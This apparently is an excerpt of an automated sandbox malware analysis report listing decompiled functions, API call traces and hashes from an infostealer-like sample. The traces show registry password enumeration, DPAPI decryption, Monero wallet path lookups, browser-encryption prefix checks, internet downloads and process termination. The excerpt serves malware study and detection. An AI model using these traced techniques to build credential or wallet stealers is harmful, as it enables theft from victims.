                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D677D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D67805
                              • Part of subcall function 00D677D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00D6784A
                              • Part of subcall function 00D677D0: StrStrA.SHLWAPI(?,Password), ref: 00D678B8
                              • Part of subcall function 00D677D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D678EC
                              • Part of subcall function 00D677D0: HeapFree.KERNEL32(00000000), ref: 00D678F3
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D67A90
                            • lstrcat.KERNEL32(00000000,?), ref: 00D67ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 00D67ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 00D67AF0
                            • wsprintfA.USER32 ref: 00D67B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D67B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D67B47
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D67B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 65383513fd79697e34d3a8bc91d8adc2b211fd684a8d34000d9375760c295376
                            • Instruction ID: b1531e2b9d17a95bcc6102c78c5304e34812f0002c68c18fe1497060419fea80
                            • Opcode Fuzzy Hash: 65383513fd79697e34d3a8bc91d8adc2b211fd684a8d34000d9375760c295376
                            • Instruction Fuzzy Hash: 9C318572A1421CAFCB10DBACDC44DAFB7B9EB84718F19451AE50993310DB71E945EB70
                            Function 00D781B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D7820C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D78243
                            • lstrlen.KERNEL32(00000000), ref: 00D78260
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D78297
                            • lstrlen.KERNEL32(00000000), ref: 00D782B4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D782EB
                            • lstrlen.KERNEL32(00000000), ref: 00D78308
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D78337
                            • lstrlen.KERNEL32(00000000), ref: 00D78351
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D78380
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: badab66982e0ad6ee9eb59a28580534b6b565e94c5e70ac7205eefc21ba7f7d7
                            • Instruction ID: fb7febe791becb51c85ae5d05e9a6e28b9df3723a55419e29c95e7ee48dcfcf9
                            • Opcode Fuzzy Hash: badab66982e0ad6ee9eb59a28580534b6b565e94c5e70ac7205eefc21ba7f7d7
                            • Instruction Fuzzy Hash: D4518C71A416029BDB10DF78D858A6AB7B8FF44740F198515ED0ADB244EB30ED50DBF0
                            Function 00D677D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D67805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00D6784A
                            • StrStrA.SHLWAPI(?,Password), ref: 00D678B8
                              • Part of subcall function 00D67750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D6775E
                              • Part of subcall function 00D67750: RtlAllocateHeap.NTDLL(00000000), ref: 00D67765
                              • Part of subcall function 00D67750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D6778D
                              • Part of subcall function 00D67750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00D677AD
                              • Part of subcall function 00D67750: LocalFree.KERNEL32(?), ref: 00D677B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D678EC
                            • HeapFree.KERNEL32(00000000), ref: 00D678F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00D67A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: fc373c78cd1964a3cf8e9390d9baae74dae97d2ab1b0c482aec388678e110057
                            • Instruction ID: 494fdd43832906fde0ac174a9cd5f66d7e8e7941228725c7666514612e0350df
                            • Opcode Fuzzy Hash: fc373c78cd1964a3cf8e9390d9baae74dae97d2ab1b0c482aec388678e110057
                            • Instruction Fuzzy Hash: C2712EB1D0421DABDB10DF95DC80ADEB7F8FF49304F14456AE509A7200EB75AA89CFA1
                            Function 00D84500 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00D74F39), ref: 00D84545
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D8454C
                            • wsprintfW.USER32 ref: 00D8455B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00D845CA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00D845D9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 00D845E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                            • String ID: %hs
                            • API String ID: 885711575-2783943728
                            • Opcode ID: 72243faaaa6968133ff0c31608f3b166e98fd25571ca57b51351613448cbad65
                            • Instruction ID: 2f6114340cac753fbe37cfa944ee91c2345195a3741fc1b2b62fdfbde371bb14
                            • Opcode Fuzzy Hash: 72243faaaa6968133ff0c31608f3b166e98fd25571ca57b51351613448cbad65
                            • Instruction Fuzzy Hash: 43314F72A04209BBEB10EBE4DC49FDE7778FF45700F10405AFA05E7190EBB0AA458BA5
                            Function 00D61120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D61135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D6113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00D61159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00D61173
                            • RegCloseKey.ADVAPI32(?), ref: 00D6117D
                            Strings
                            • wallet_path, xrefs: 00D6116D
                            • SOFTWARE\monero-project\monero-core, xrefs: 00D6114F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: f1c077b7558f329eeb59d8033986541f9e94782a9fde13db61f5c7210d7e07d2
                            • Instruction ID: 06a096ed8ab48afc83c0f419f4fbb0208d6bfbf8030f3c5dbf42db43761b1a02
                            • Opcode Fuzzy Hash: f1c077b7558f329eeb59d8033986541f9e94782a9fde13db61f5c7210d7e07d2
                            • Instruction Fuzzy Hash: EFF0907964030DFFEB009BE5AC4EFEA7B7CEB04755F000155FE05E2290E6B05A4897A0
                            Function 00D69DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 00D69E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 00D69E42
                            • LocalAlloc.KERNEL32(00000040), ref: 00D69EA7
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            • lstrcpy.KERNEL32(00000000,00D94C48), ref: 00D69FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: ac5275a0df22a965eda1de020c1d966d8ef2e5cf495645eb9ef4a86413e5ac65
                            • Instruction ID: 868fb5a0a2f98d1aaffc470abf45acd9249ab57de893cac45900b40ee29be94a
                            • Opcode Fuzzy Hash: ac5275a0df22a965eda1de020c1d966d8ef2e5cf495645eb9ef4a86413e5ac65
                            • Instruction Fuzzy Hash: 2E51A171A512099FDB10EFA8DC51BAEB7B8EF50314F194025F949EB241DBB0ED058BB0
                            Function 00D65640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D6565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D65661
                            • InternetOpenA.WININET(00D8CFEC,00000000,00000000,00000000,00000000), ref: 00D65677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00D65692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00D656BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 00D656E1
                            • InternetCloseHandle.WININET(?), ref: 00D656FA
                            • InternetCloseHandle.WININET(00000000), ref: 00D65701
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: a75d43858d9061c754ea562c09ba2820507de7e3a100b31fc8a6b0281f7e80a7
                            • Instruction ID: d190d68ca9b39c6ba8e69d048a0674c491452fc4cf97d06cac0ab86096722eb6
                            • Opcode Fuzzy Hash: a75d43858d9061c754ea562c09ba2820507de7e3a100b31fc8a6b0281f7e80a7
                            • Instruction Fuzzy Hash: D4418370A00609DFDB14CF59ED44F9AB7B5FF48304F18806EE5189B2A5E7719981CFA4
                            Function 00D84740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00D84759
                            • Process32First.KERNEL32(00000000,00000128), ref: 00D84769
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D8477B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D8479C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D847AB
                            • CloseHandle.KERNEL32(00000000), ref: 00D847B2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D847C0
                            • CloseHandle.KERNEL32(00000000), ref: 00D847CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: b2cd81c9e0a9b04729029e1476f263a345c9599bb4734e14e9114642d87d5fae
                            • Instruction ID: 560e27dcb186855fda022ddbe57580098696247f606409752f8456d6964ccd88
                            • Opcode Fuzzy Hash: b2cd81c9e0a9b04729029e1476f263a345c9599bb4734e14e9114642d87d5fae
                            • Instruction Fuzzy Hash: 6401D87160131DABE7206B749C8DFEA77BCEB49756F041186F905D1090EFB48D809BB0
                            Function 00D783E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D78435
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7846C
                            • lstrlen.KERNEL32(00000000), ref: 00D784B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D784E9
                            • lstrlen.KERNEL32(00000000), ref: 00D784FF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7852E
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D7853E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 204528d3ae05207498a2901c2afbbf7e2ca5455f3831c87c3a709087f3112c84
